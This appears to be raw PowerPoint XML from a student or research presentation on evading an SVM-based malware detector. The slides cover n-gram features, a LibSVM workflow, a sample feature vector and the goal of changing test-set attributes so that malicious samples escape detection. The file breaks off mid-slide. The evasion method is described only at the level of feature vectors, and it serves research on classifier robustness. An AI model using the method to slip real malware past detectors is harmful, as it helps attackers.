              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Solution: without legal access to real-world virus samples, we can test by directly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>modifying attribute values</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> in given malicious samples</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7534328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Evaluation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589212" y="1719256"/>
            <a:ext cx="8915400" cy="3777622"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Key: comparison with known hiding schemes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Diagram 3"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="355853010"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="617538" y="2614611"/>
          <a:ext cx="5434015" cy="38809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Diagram 4"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="368198428"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6500813" y="2614611"/>
          <a:ext cx="5453059" cy="388090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113970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sz="4400" dirty="0" smtClean="0"/>
              <a:t>Related</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0" smtClean="0"/>
              <a:t>Work</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589212" y="1450121"/>
            <a:ext cx="8915400" cy="5587173"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>N-gram Feature</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0"/>
              <a:t>a1b2c3d4  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t> 3-gram: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0"/>
              <a:t>a1b2c3 &amp; b2c3d4</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Binary/Assembly/DLL N-gram Feature Set</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Hybrid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0"/>
              <a:t>model:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Combine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0"/>
              <a:t>three</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Best 500 features for each set based on Gain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Algorithm: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>libSVM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>Masud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>, Mohammad M., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>Latifur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t> Khan, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>Bhavani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>Thuraisingham</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>. "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0"/>
              <a:t>A hybrid model to detect malicious executables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>." Communications, 2007. ICC'07. IEEE International Conference on. IEEE, 2007.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3639672" y="4035585"/>
            <a:ext cx="6097868" cy="871124"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11006613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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">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nodeType="click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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="3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Workflow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589212" y="1596325"/>
            <a:ext cx="8915400" cy="444040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514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Data preprocessing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Model training (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>LibSVM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>) and testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Modify the data in the test set and redo testing using original </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>libSVM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Compare the performance </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16652049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Workflow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589212" y="1596325"/>
            <a:ext cx="8915400" cy="444040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514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Data preprocessing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Model training (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>LibSVM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>) and testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Modify the data in the test set and redo testing using original </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>libSVM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Compare the performance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8838902" y="4330741"/>
            <a:ext cx="1719609" cy="2185017"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1707056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400" dirty="0" smtClean="0"/>
              <a:t>Data Preprocessing</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="44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90194" y="1471613"/>
            <a:ext cx="10843024" cy="454017"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2217596" y="2085975"/>
            <a:ext cx="9149698" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:shade val="90000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Instance example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0"/>
              <a:t>1:1 3:1 5:1 7:1 9:1 11:1 26:1 30:1 33:1 37:1 39:1 42:1 44:1 50:1 53:1 57:1 59:1 67:1 79:1 82:1 84:1 92:1 98:1 102:1 107:1 111:1 113:1 126:1 128:1 132:1 140:1 154:1 157:1 164:1 168:1 171:1 186:1 189:1 193:1 213:1 219:1 227:1 231:1 238:1 258:1 268:1 275:1 279:1 282:1 291:1 302:1 318:1 331:1 339:1 362:1 367:1 369:1 378:1 388:1 400:1 409:1 412:1 417:1 419:1 427:1 431:1 446:1 449:1 455:1 457:1 466:1 476:1 491:1 497:1 500:1 503:1  -1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2217596" y="5313938"/>
            <a:ext cx="9149698" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>All attributes are binary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>ttributes with FALSE value are not shown</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: benign	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: malicious</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18605777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Preprocessing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Randomly pick instances</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>80% as Training set (total: 298  +: 59  -: 239)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>20% as Test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>set	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>      (total: 75    +: 13  -: 62  )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Remove the “-1” at the end of each instance to meet the input requirement of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>LibSVM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17808127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training</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1854921" y="2133600"/>
            <a:ext cx="10018424" cy="3777622"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Assumption: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>raining set &amp; SVM model is known</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Goal: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>odify the test set to escape detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Test with original test set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> Accuracy: 98.6667% (74/75)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2646364" y="3308028"/>
            <a:ext cx="1828800" cy="1077218"/>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3200" dirty="0" smtClean="0"/>
              <a:t>Training Data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8728076" y="3308028"/>
            <a:ext cx="1828800" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent2"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
